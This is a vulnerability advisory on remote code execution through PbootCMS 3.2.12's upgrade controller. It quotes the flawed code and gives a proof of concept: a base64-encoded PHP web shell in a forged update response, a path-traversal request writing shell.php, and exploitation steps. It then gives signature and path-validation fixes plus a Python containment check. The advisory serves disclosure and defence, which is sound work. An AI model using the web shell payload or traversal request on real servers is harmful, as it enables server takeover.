PbootCMS 3.2.12 - Authenticated RCE via Upgrade System #7
Vendor
https://github.com/hnaoyun/PbootCMS
Vulnerability file
apps/admin/controller/system/UpgradeController.php
Description
Code analysis
The upgrade system downloads files from a remote server and writes them to the filesystem without any integrity verification:
```php
// Line 314-321
private function getServerFile($source, $des)
{
    // Plain-HTTP request to the update server; the response is trusted as-is
    $url = $this->server . '/index.php?p=/upgrade/getFile&branch=' . $this->branch;
    $data['path'] = $source;
    $file = basename($source);
    if (! ! $rs = json_decode(get_url($url, $data, '', true))) {
        if ($rs->code) {
            // No signature, checksum or destination-path check before the write
            if (! file_put_contents($des, base64_decode($rs->data))) { // Writes arbitrary content!
                // ...
            }
        }
    }
}

// Line 224-230 - File copy without validation
if (isset($files)) {
    foreach ($files as $value) {
        // Source and destination come from the update manifest and are not validated
        if (! copy($value['sfile'], $value['dfile'])) { // Copies files without validation!
            // ...
        }
    }
}
```

The system trusts the remote server completely and writes arbitrary content to the filesystem.
POC
Attack Scenario 1: MITM on update server
- Intercept traffic to www.pbootcms.com
- Modify the update response:

```json
{
  "code": 1,
  "data": "PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+" // base64 of <?php system($_GET['cmd']); ?>
}
```

- Admin triggers update
- Malicious code is written to server
Attack Scenario 2: Compromised update server
If www.pbootcms.com is compromised:
- Attacker modifies update files
- All PbootCMS installations receive malicious updates
- Supply chain attack affects all users
Attack Scenario 3: Local file manipulation

```http
POST /admin.php/Upgrade/update HTTP/1.1
Host: target.com
Cookie: PHPSESSID=admin_session
Content-Type: application/x-www-form-urlencoded

list=/../../../shell.php
```

Step-by-step exploitation:
- Login as admin
- Navigate to /admin.php/Upgrade
- Click "Check Update"
- Intercept the update request
- Modify the file list to include malicious paths
- Trigger update
- Access created shell
Impact
- Remote Code Execution (RCE)
- Complete server compromise
- Supply chain attack potential
- Backdoor installation
- Data exfiltration
Technical Details
The vulnerability exists because:
- No signature verification: Files are not signed or verified
- HTTP used: Update server URL is HTTP (can be intercepted)
- No checksum validation: MD5 is only used for comparison, not security
- Arbitrary file write: Any file path can be written to
- No rate limiting: Unlimited update attempts
Attack vectors:
- DNS spoofing of www.pbootcms.com
- MITM on HTTP connections
- Compromised update server
- Malicious proxy interception
Fix suggestion

```php
// 1. Use HTTPS with certificate validation
private $server = 'https://www.pbootcms.com';

// 2. Verify file signatures
private function verifySignature($file, $signature)
{
    $publicKey = file_get_contents(ROOT_PATH . '/config/upgrade_public.key');
    // openssl_verify() returns 1 (valid), 0 (invalid) or -1 (error); only 1 is a pass
    return openssl_verify($file, base64_decode($signature), $publicKey, OPENSSL_ALGO_SHA256) === 1;
}

// 3. Validate file paths
private function validatePath($path)
{
    $realPath = realpath(dirname($path));
    $rootPath = realpath(ROOT_PATH);
    if ($realPath === false || $rootPath === false) {
        return false; // parent directory does not exist or cannot be resolved
    }
    // Compare with a trailing separator so "/var/www-evil" is not accepted as inside "/var/www"
    return strpos($realPath . DIRECTORY_SEPARATOR, $rootPath . DIRECTORY_SEPARATOR) === 0;
}

// 4. Add integrity check
private function getServerFile($source, $des)
{
    // ... existing code ...
    // Verify signature (a response without one is rejected as well)
    if (!isset($rs->signature) || !$this->verifySignature(base64_decode($rs->data), $rs->signature)) {
        $this->log("File signature verification failed!");
        json(0, "File signature verification failed!");
        return; // never reach the write below
    }
    // Validate path
    if (!$this->validatePath($des)) {
        json(0, "Invalid file path!");
        return;
    }
    // Write file
    file_put_contents($des, base64_decode($rs->data));
}
```

Additional Recommendations
- Use signed updates with public key cryptography
- Enforce HTTPS with certificate pinning
- Implement file path whitelist
- Add checksum verification after write
- Log all update activities
- Require additional confirmation for updates
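To make the path check from the fix suggestion concrete, here is an added example (not PbootCMS code, and written in Python rather than PHP) that applies the same containment rule to the kind of value seen in Attack Scenario 3, plus the sibling-directory and symlink cases that a plain string-prefix comparison misses; the install root, the update envelope and the harmless file body are constructed for the example.

```python
import base64
import json
import os
import tempfile

class UnsafeUpdate(Exception):
    """Raised when a server-supplied update entry must not be written."""

def safe_destination(root: str, requested: str) -> str:
    """Map a server-supplied relative path to an absolute path under root, rejecting
    absolute paths, '..' traversal and symlinks that resolve outside root."""
    if not requested or os.path.isabs(requested) or "\x00" in requested:
        raise UnsafeUpdate(f"absolute, empty or NUL-bearing path: {requested!r}")
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, requested))  # resolves .. and symlinks
    # commonpath, not a string-prefix test: '/var/www-evil' must not pass as inside '/var/www'
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise UnsafeUpdate(f"path escapes install root: {requested!r}")
    return candidate

def decode_update_envelope(raw: bytes) -> bytes:
    """Parse the {"code": 1, "data": <base64>} envelope; this checks shape only, a
    signature over the decoded bytes must still supply authenticity."""
    rs = json.loads(raw)
    if rs.get("code") != 1 or not isinstance(rs.get("data"), str):
        raise UnsafeUpdate("unexpected update envelope")
    return base64.b64decode(rs["data"], validate=True)

def demo() -> dict:
    """Run the checks against a constructed install root and return the verdicts."""
    verdicts = {}
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as outside:
        os.makedirs(os.path.join(root, "apps", "admin"))
        os.symlink(outside, os.path.join(root, "escape"))  # directory symlink leaving root
        cases = {
            "normal": "apps/admin/x.php",
            "absolute": "/../../../shell.php",  # the list= value from scenario 3
            "sibling": "../" + os.path.basename(root) + "-evil/shell.php",
            "symlink": "escape/shell.php",
        }
        for name, requested in cases.items():
            try:
                safe_destination(root, requested)
                verdicts[name] = "accepted"
            except UnsafeUpdate:
                verdicts[name] = "rejected"
    body = b"<?php echo 'ok'; ?>"  # constructed, harmless file body
    envelope = json.dumps({"code": 1, "data": base64.b64encode(body).decode()}).encode()
    verdicts["envelope"] = decode_update_envelope(envelope) == body
    return verdicts
```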